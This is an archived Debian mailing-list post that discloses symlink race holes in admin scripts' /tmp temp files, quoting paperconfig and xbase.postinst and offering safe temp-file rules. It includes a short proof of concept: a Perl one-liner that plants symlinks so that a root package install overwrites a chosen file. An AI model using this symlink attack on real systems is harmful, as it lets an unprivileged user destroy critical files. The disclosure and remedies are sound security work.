[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Insecure admin scripts with /tmp temp files



There are several administrative programs that use temporary files in /tmp
without proper checking, resulting in major security holes. To make
problems worse, many packages have {post,pre}{inst,rm} scripts with the
same holes.

For example, /usr/sbin/paperconfig: a malicious user can destroy any file
by creating symbolic links in /tmp/.papersize.[$$..$$+100]. Now he only has
to wait for unsuspicious superuser to run paperconfig, which does not
precheck the temp files it creates. Line 97:
    if echo "$1" >/tmp/.papersize.$$

Another example of postinst script security hole in xbase.postinst, caused
by lines 131-132:
sed /^xbase-not-configured/d /etc/X11/config >/tmp/config.$$
mv /tmp/config.$$ /etc/X11/config

You can demonstrate the hole as follows:

As superuser, do
# echo 'do not mangle'> /precious
# chmod 600 /precious

Think /precious as /dev/hd*, /etc/passwd etc.

As normal user, do 
perl -e 'foreach $i ($$..$$+200) {symlink("/precious", "/tmp/config.$i");}'

This creates a few symlinks in /tmp.

Now, as superuser, do
# dpkg -i xbase_3.3-3.deb
# cat /precious 
no-xdm-start-server
no-start-xdm
# ls -l /etc/X11/config 
lrwxrwxrwx   1 tom      tom             9 Jul 31 12:00 /etc/X11/config -> /precious

Horrible!

To clean up, do
# rm /etc/X11/config 
# mv /precious /etc/X11/config
# rm /tmp/config.*


Maybe there should be a set of rules for using temp files in security
critical applications (perhaps in Developers manual or Policy manual). Here
are a few suggestions:

1. Setuid programs and those programs run only with privileged uid
(daemons, admin) should not use publicly writable directories for temp
files, instead they should use a dedicated directory with uid only access.
For cases like paperconfig, where the temporary file will ultimately
replace a config file in /etc, /etc/*.conf.new might be a good choice.
There's a new problem though, deleting leftover files.

2. Temp files should be created with mode 600. Read access can also be
harmful.

3. A clueful superuser might want to use TMPDIR environment variable,
pointing to a secure place for temp files. If temp files are created with
libc tempnam(), this is automatically used.

One could do clever tricks to check if the temp file does not exist, but I
think this is just asking for race condition, NFS etc. problems.
In C, you can  use O_EXCL.

-Topi


-- 
Topi Miettinen  Off-World Colonies- the chance  Hatanpaanvaltatie 18
Project Manager	to begin again in a golden land FIN-33100 Tampere
Telecom Finland	of opportunity and adventure    Finland, Europe



--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-request@lists.debian.org . 
Trouble?  e-mail to templin@bucknell.edu .


Reply to: